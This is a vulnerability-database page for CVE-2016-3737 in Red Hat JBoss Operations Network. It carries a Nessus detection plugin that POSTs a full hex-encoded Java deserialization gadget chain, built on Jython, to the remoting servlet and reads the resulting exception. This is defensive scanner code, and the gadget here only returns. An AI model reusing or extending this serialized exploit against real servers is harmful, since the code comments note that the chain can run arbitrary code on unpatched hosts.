9 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:P/I:P/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.008 Low
EPSS
Percentile
81.5%
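The remote Red Hat JBoss Operations Network server is affected by a remote code execution vulnerability due to unsafe deserialization of Java objects from unauthenticated clients, involving the Jython library. An unauthenticated, remote attacker can exploit this by sending specially crafted Java objects to the HTTP interface to execute arbitrary code on the target host. The plugin's solution text below notes that Red Hat released JBoss Operations Network 3.3 Update 06 for this issue, that Tenable Research confirmed the update did not resolve it, and that enabling agent authentication is the mitigation.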
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
# Registration pass: when the scanner loads the plugin with `description` set,
# only the metadata below is recorded, and exit(0) returns before any request
# is sent to a target.
if (description)
{
# Plugin identity and the external identifiers this check maps to.
script_id(91487);
script_version("1.11");
script_cvs_date("Date: 2019/11/19");
script_cve_id("CVE-2016-3737");
script_bugtraq_id(90430);
script_xref(name:"TRA", value:"TRA-2016-22");
script_name(english:"Red Hat JBoss Operations Network Java Object Deserialization RCE");
script_summary(english:"Sends an unexpected Java object to the server.");
script_set_attribute(attribute:"synopsis", value:
"The remote JBoss Operations Network server is affected by a remote
code execution vulnerability");
script_set_attribute(attribute:"description", value:
"The remote Red Hat JBoss Operations Network server is affected by a
remote code execution vulnerability due to unsafe deserialize calls of
unauthenticated Java objects to the Jython library. An
unauthenticated, remote attacker can exploit this, by sending
specially crafted Java objects to the HTTP interface, to execute
arbitrary code on the target host.");
script_set_attribute(attribute:"see_also", value:"https://www.tenable.com/security/research/tra-2016-22");
script_set_attribute(attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2016-3737");
# NOTE(review): the solution text states that the vendor update did not
# resolve the issue, while the temporal vectors further down record
# RL:OF / RL:O (official fix). Triage on the mitigation named here (agent
# authentication) rather than on the remediation-level metric alone.
script_set_attribute(attribute:"solution", value:
"Red Hat has released JBoss Operations Network 3.3 Update 06 to address
this issue; however, Tenable Research has confirmed that the update
did not resolve the issue. To mitigate this issue, users should enable
agent authentication.");
# Base vectors: network-reachable, low complexity, no authentication or
# privileges required, no user interaction.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-3737");
# Exploitability metadata. exploited_by_nessus is set, consistent with the
# check below sending a crafted object instead of comparing version strings.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
# Timeline: the plugin date (2016/06/06) precedes the recorded patch date (2016/06/24).
script_set_attribute(attribute:"vuln_publication_date", value:"2016/05/02");
script_set_attribute(attribute:"patch_publication_date", value:"2016/06/24");
script_set_attribute(attribute:"plugin_publication_date", value:"2016/06/06");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_operations_network");
script_end_attributes();
# ACT_ATTACK: this is an active check; the code after the includes POSTs a
# serialized Java object to the target.
script_category(ACT_ATTACK);
script_family(english:"Misc.");
script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
# Gating: the check depends on jboss_on_detect.nbin and requires the
# "installed_sw/JBoss Operations Network" key, presumably written by that
# detection plugin (confirm), so it runs only where the product was detected.
script_dependencies("jboss_on_detect.nbin");
script_require_keys("installed_sw/JBoss Operations Network");
# Candidate web ports: any detected www service, plus 7080 and 7443.
script_require_ports("Services/www", 7080, 7443);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("webapp_func.inc");
include("http.inc");
# Resolve the target install from earlier detection results. The names set
# here (appname, port, install) are read again by the request and audit
# calls further down.
appname = 'JBoss Operations Network';
# exit_if_zero:TRUE is passed, so the plugin presumably stops here when no
# install of appname has been recorded.
get_install_count(app_name:appname, exit_if_zero:TRUE);
# 7080 is the default handed to get_http_port; script_require_ports also lists 7443.
port = get_http_port(default:7080);
# install["version"] is used later in the not-vulnerable audit message.
install = get_single_install(app_name:appname, port:port);
# This blob is (eventually) a PyFunction that, upon deserialization, simply executes
# the Python byte code "return". Technically speaking, it could do much more than that,
# although only builtins are available (so reading/writing files). It is far easier to
# determine that the remote server is vulnerable via the class cast exception that occurs
# on success, which is the text the response check below looks for.
crafted_object = '\xac\xed\x00\x05\x73\x72\x00\x17\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x50\x72\x69\x6f\x72\x69\x74\x79\x51\x75\x65\x75\x65\x94\xda\x30\xb4\xfb\x3f\x82\xb1\x03\x00\x02\x49\x00\x04\x73\x69\x7a\x65\x4c\x00\x0a\x63\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x3b\x78\x70\x00\x00\x00\x02\x73\x7d\x00\x00\x00\x01\x00\x14\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x1a\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x46\x75\x6e\x63\x74\x69\x6f\x6e\xe6\x2f\xd1\xed\x36\x06\xb6\x52\x02\x00\x08\x4c\x00\x08\x5f\x5f\x64\x69\x63\x74\x5f\x5f\x74\x00\x1a\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x07\x5f\x5f\x64\x6f\x63\x5f\x5f\x71\x00\x7e\x00\x08\x4c\x00\x0a\x5f\x5f\x6d\x6f\x64\x75\x6c\x65\x5f\x5f\x71\x00\x7e\x00\x08\x4c\x00\x08\x5f\x5f\x6e\x61\x6d\x65\x5f\x5f\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0c\x66\x75\x6e\x63\x5f\x63\x6c\x6f\x73\x75\x72\x65\x71\x00\x7e\x00\x08\x4c\x00\x09\x66\x75\x6e\x63\x5f\x63\x6f\x64\x65\x74\x00\x18\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x43\x6f\x64\x65\x3b\x5b\x00\x0d\x66\x75\x6e\x63\x5f\x64\x65\x66\x61\x75\x6c\x74\x73\x74\x00\x1b\x5b\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0c\x66\x75\x6e\x63\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x71\x00\x7e\x00\x08\x78\x72\x00\x18\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x
2e\x50\x79\x4f\x62\x6a\x65\x63\x74\xb3\x6a\x64\xf0\x6f\x10\xd3\x67\x02\x00\x02\x4c\x00\x09\x6a\x61\x76\x61\x50\x72\x6f\x78\x79\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x07\x6f\x62\x6a\x74\x79\x70\x65\x74\x00\x18\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x54\x79\x70\x65\x3b\x78\x70\x70\x73\x72\x00\x23\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x54\x79\x70\x65\x24\x54\x79\x70\x65\x52\x65\x73\x6f\x6c\x76\x65\x72\x7b\x81\x53\xc5\x9e\x62\x6a\xf9\x02\x00\x03\x4c\x00\x06\x6d\x6f\x64\x75\x6c\x65\x71\x00\x7e\x00\x09\x4c\x00\x04\x6e\x61\x6d\x65\x71\x00\x7e\x00\x09\x4c\x00\x10\x75\x6e\x64\x65\x72\x6c\x79\x69\x6e\x67\x5f\x63\x6c\x61\x73\x73\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x74\x00\x0b\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x5f\x5f\x74\x00\x08\x66\x75\x6e\x63\x74\x69\x6f\x6e\x76\x71\x00\x7e\x00\x07\x70\x70\x70\x74\x00\x08\x3c\x6d\x6f\x64\x75\x6c\x65\x3e\x70\x73\x72\x00\x1a\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x42\x79\x74\x65\x63\x6f\x64\x65\xac\x96\xf9\x29\x14\x55\x26\x12\x02\x00\x08\x49\x00\x0c\x63\x6f\x5f\x73\x74\x61\x63\x6b\x73\x69\x7a\x65\x49\x00\x05\x63\x6f\x75\x6e\x74\x5a\x00\x05\x64\x65\x62\x75\x67\x49\x00\x08\x6d\x61\x78\x43\x6f\x75\x6e\x74\x5b\x00\x07\x63\x6f\x5f\x63\x6f\x64\x65\x74\x00\x02\x5b\x42\x5b\x00\x09\x63\x6f\x5f\x63\x6f\x6e\x73\x74\x73\x71\x00\x7e\x00\x0b\x5b\x00\x09\x63\x6f\x5f\x6c\x6e\x6f\x74\x61\x62\x71\x00\x7e\x00\x18\x5b\x00\x08\x63\x6f\x5f\x6e\x61\x6d\x65\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x78\x72\x00\x1a\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x42\x61\x73\x65\x43\x6f\x64\x65\x5e\x76\xd4\x44\x41\xc3\x94\x74\x02\x00\x0c\x49\x00\x0b\x63\x6f\x5f\x61\x72\x67\x63\x6f\x75\x6e\x74\x49\x00\x0e\x63\x6f\x5f\x66\x69\x72\x73\x74\x6c\x69\x6e\x65\x6e\x6f\x49\x00\x0a\x63\x6f\x5f\x6e\x
6c\x6f\x63\x61\x6c\x73\x49\x00\x0c\x6a\x79\x5f\x6e\x70\x75\x72\x65\x63\x65\x6c\x6c\x49\x00\x05\x6e\x61\x72\x67\x73\x5a\x00\x07\x76\x61\x72\x61\x72\x67\x73\x5a\x00\x09\x76\x61\x72\x6b\x77\x61\x72\x67\x73\x5b\x00\x0b\x63\x6f\x5f\x63\x65\x6c\x6c\x76\x61\x72\x73\x71\x00\x7e\x00\x19\x4c\x00\x0b\x63\x6f\x5f\x66\x69\x6c\x65\x6e\x61\x6d\x65\x71\x00\x7e\x00\x09\x4c\x00\x08\x63\x6f\x5f\x66\x6c\x61\x67\x73\x74\x00\x1f\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x43\x6f\x6d\x70\x69\x6c\x65\x72\x46\x6c\x61\x67\x73\x3b\x5b\x00\x0b\x63\x6f\x5f\x66\x72\x65\x65\x76\x61\x72\x73\x71\x00\x7e\x00\x19\x5b\x00\x0b\x63\x6f\x5f\x76\x61\x72\x6e\x61\x6d\x65\x73\x71\x00\x7e\x00\x19\x78\x72\x00\x16\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x43\x6f\x64\x65\x74\x54\x66\x12\x37\x82\xc5\x3b\x02\x00\x01\x4c\x00\x07\x63\x6f\x5f\x6e\x61\x6d\x65\x71\x00\x7e\x00\x09\x78\x71\x00\x7e\x00\x0c\x70\x73\x71\x00\x7e\x00\x10\x71\x00\x7e\x00\x13\x74\x00\x08\x62\x79\x74\x65\x63\x6f\x64\x65\x76\x71\x00\x7e\x00\x17\x71\x00\x7e\x00\x16\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x70\x74\x00\x06\x6e\x6f\x6e\x61\x6d\x65\x73\x72\x00\x1d\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x43\x6f\x6d\x70\x69\x6c\x65\x72\x46\x6c\x61\x67\x73\x6c\xb8\x3b\x06\x8e\xbb\x10\x0f\x02\x00\x05\x5a\x00\x11\x64\x6f\x6e\x74\x5f\x69\x6d\x70\x6c\x79\x5f\x64\x65\x64\x65\x6e\x74\x5a\x00\x08\x6f\x6e\x6c\x79\x5f\x61\x73\x74\x5a\x00\x0e\x73\x6f\x75\x72\x63\x65\x5f\x69\x73\x5f\x75\x74\x66\x38\x4c\x00\x08\x65\x6e\x63\x6f\x64\x69\x6e\x67\x71\x00\x7e\x00\x09\x4c\x00\x05\x66\x6c\x61\x67\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x53\x65\x74\x3b\x78\x70\x00\x00\x00\x70\x73\x72\x00\x24\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x45\x6e\x75\x6d\x53\x65\x74\x24\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x50\x72\x6f\x78\x79\x05\x07\xd3\xdb\x76\x54\xca\xd1\x02\x00\x02\x4c\x00\x0b\x65\x6c\x65\x6d\x65\x6e\x74\x54\x79\x70\x
65\x71\x00\x7e\x00\x11\x5b\x00\x08\x65\x6c\x65\x6d\x65\x6e\x74\x73\x74\x00\x11\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x6e\x75\x6d\x3b\x78\x70\x76\x72\x00\x18\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x43\x6f\x64\x65\x46\x6c\x61\x67\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x78\x72\x00\x0e\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x6e\x75\x6d\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x78\x70\x75\x72\x00\x11\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x6e\x75\x6d\x3b\xa8\x8d\xea\x2d\x33\xd2\x2f\x98\x02\x00\x00\x78\x70\x00\x00\x00\x02\x7e\x71\x00\x7e\x00\x28\x74\x00\x09\x43\x4f\x5f\x4e\x45\x53\x54\x45\x44\x7e\x71\x00\x7e\x00\x28\x74\x00\x14\x43\x4f\x5f\x47\x45\x4e\x45\x52\x41\x54\x4f\x52\x5f\x41\x4c\x4c\x4f\x57\x45\x44\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x00\x71\x00\x7e\x00\x33\x00\x00\x00\x0a\x00\x00\x00\x00\x00\xff\xff\xff\xff\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x00\x04\x64\x00\x00\x53\x75\x72\x00\x1b\x5b\x4c\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x4f\x62\x6a\x65\x63\x74\x3b\x25\x04\x40\xd5\x1b\xd0\x04\x3f\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00\x18\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x53\x74\x72\x69\x6e\x67\x2d\x43\xb5\xfa\x3c\xac\x49\xd1\x02\x00\x01\x4c\x00\x06\x73\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x09\x78\x72\x00\x1c\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x42\x61\x73\x65\x53\x74\x72\x69\x6e\x67\x25\x17\x51\xe8\xb3\x09\x2f\x9c\x02\x00\x00\x78\x72\x00\x1a\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x53\x65\x71\x75\x65\x6e\x63\x65\xa1\x41\x11\xa8\xfb\xc3\xae\x67\x02\x00\x01\x4c\x00\x09\x64\x65\x6c\x65\x67\x61\x74\x6f\x72\x74\x00\x27\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x
53\x65\x71\x75\x65\x6e\x63\x65\x49\x6e\x64\x65\x78\x44\x65\x6c\x65\x67\x61\x74\x65\x3b\x78\x71\x00\x7e\x00\x0c\x70\x73\x71\x00\x7e\x00\x10\x71\x00\x7e\x00\x13\x74\x00\x03\x73\x74\x72\x76\x71\x00\x7e\x00\x38\x73\x72\x00\x1c\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x53\x65\x71\x75\x65\x6e\x63\x65\x24\x31\xd7\x1b\xb3\xc6\xac\x1f\x60\xd7\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x1c\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x53\x65\x71\x75\x65\x6e\x63\x65\x3b\x78\x72\x00\x25\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x53\x65\x71\x75\x65\x6e\x63\x65\x49\x6e\x64\x65\x78\x44\x65\x6c\x65\x67\x61\x74\x65\x17\xcf\xdb\x2f\xe9\xe7\x04\xc2\x02\x00\x00\x78\x70\x71\x00\x7e\x00\x3c\x71\x00\x7e\x00\x33\x73\x71\x00\x7e\x00\x38\x70\x71\x00\x7e\x00\x3d\x73\x71\x00\x7e\x00\x40\x71\x00\x7e\x00\x44\x74\x00\x13\x2e\x2f\x6e\x65\x73\x73\x75\x73\x5f\x6a\x79\x74\x68\x6f\x6e\x31\x2e\x70\x79\x73\x71\x00\x7e\x00\x38\x70\x71\x00\x7e\x00\x3d\x73\x71\x00\x7e\x00\x40\x71\x00\x7e\x00\x47\x74\x00\x02\x77\x2b\x73\x71\x00\x7e\x00\x38\x70\x71\x00\x7e\x00\x3d\x73\x71\x00\x7e\x00\x40\x71\x00\x7e\x00\x4a\x74\x00\x00\x75\x71\x00\x7e\x00\x34\x00\x00\x00\x00\x75\x71\x00\x7e\x00\x31\x00\x00\x00\x04\x74\x00\x04\x6f\x70\x65\x6e\x74\x00\x05\x77\x72\x69\x74\x65\x74\x00\x05\x63\x6c\x6f\x73\x65\x74\x00\x08\x65\x78\x65\x63\x66\x69\x6c\x65\x70\x73\x72\x00\x1b\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x53\x74\x72\x69\x6e\x67\x4d\x61\x70\xb4\x24\xfa\xff\x19\x86\x24\x79\x02\x00\x01\x4c\x00\x05\x74\x61\x62\x6c\x65\x74\x00\x24\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x4d\x61\x70\x3b\x78\x71\x00\x7e\x00\x0c\x70\x73\x71\x00\x7e\x00\x10\x71\x00\x7e\x00\x13\x74\x00\x09\x73\x74\x72\x69\x6e\x67\x6d\x61\x70\x76\x71\x00\x7e\x00\x53\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x
6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x64\x99\xde\x12\x9d\x87\x29\x3d\x03\x00\x03\x49\x00\x0b\x73\x65\x67\x6d\x65\x6e\x74\x4d\x61\x73\x6b\x49\x00\x0c\x73\x65\x67\x6d\x65\x6e\x74\x53\x68\x69\x66\x74\x5b\x00\x08\x73\x65\x67\x6d\x65\x6e\x74\x73\x74\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x78\x70\x00\x00\x00\x0f\x00\x00\x00\x1c\x75\x72\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x52\x77\x3f\x41\x32\x9b\x39\x74\x02\x00\x00\x78\x70\x00\x00\x00\x10\x73\x72\x00\x2e\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x1f\x36\x4c\x90\x58\x93\x29\x3d\x02\x00\x01\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x78\x72\x00\x28\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x66\x55\xa8\x2c\x2c\xc8\x6a\xeb\x02\x00\x01\x4c\x00\x04\x73\x79\x6e\x63\x74\x00\x2f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x6c\x6f\x63\x6b\x73\x2f\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x53\x79\x6e\x63\x3b\x78\x70\x73\x72\x00\x34\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x4e\x6f\x6e\x66\x61\x69\x72\x53\x79\x6e\x63\x65\x88\x32\xe7\x53\x7b\xbf\x0b\x02\x00\x00\x78\x72\x00\x2d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x
63\x6b\x24\x53\x79\x6e\x63\xb8\x1e\xa2\x94\xaa\x44\x5a\x7c\x02\x00\x00\x78\x72\x00\x35\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x51\x75\x65\x75\x65\x64\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x66\x55\xa8\x43\x75\x3f\x52\xe3\x02\x00\x01\x49\x00\x05\x73\x74\x61\x74\x65\x78\x72\x00\x36\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x4f\x77\x6e\x61\x62\x6c\x65\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x33\xdf\xaf\xb9\xad\x6d\x6f\xa9\x02\x00\x00\x78\x70\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x70\x70\x78\x77\x04\x00\x00\x00\x03\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x
67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x71\x00\x7e\x00\x87\x78';
# Send the serialized object in one POST to the remoting servlet, then
# classify the target from the response body.
invoker_url = "/jboss-remoting-servlet-invoker/ServerInvokerServlet/?generalizeSocketException=true";
req_headers = make_array(
  "Content-Type", "application/octet-stream",
  "JBoss-Remoting-Version", "22");
res = http_send_recv3(
  method:"POST",
  item:invoker_url,
  data:crafted_object,
  add_headers:req_headers,
  port:port,
  exit_on_fail:TRUE);

# A usable reply is a three-element list; anything else is audited as a bad
# response. audit() does not return, so the two guards are equivalent to one
# combined test.
if (isnull(res)) audit(AUDIT_RESP_BAD, port);
if (len(res) != 3) audit(AUDIT_RESP_BAD, port);

# The verdict rests only on this exception text appearing in the body (res[2]).
# NOTE(review): if something in front of the server replaces error bodies or
# strips stack traces, an affected host would be audited as not vulnerable;
# confirm against the deployment before treating a negative as conclusive.
cast_error = "java.lang.ClassCastException: org.python.core.PySingleton cannot be cast to";
if (cast_error >!< res[2])
  audit(AUDIT_INST_VER_NOT_VULN, appname, install["version"]);

# Marker present: report the finding on the port that answered.
finding =
  '\nNessus was able to exploit a Java deserialization vulnerability by' +
  '\nsending a crafted Java object.' +
  '\n';
security_report_v4(port:port, severity:SECURITY_HOLE, extra:finding);
Vendor | Product | Version | CPE |
---|---|---|---|
redhat | jboss_operations_network | | cpe:/a:redhat:jboss_operations_network |
9 High
CVSS2
Attack Vector
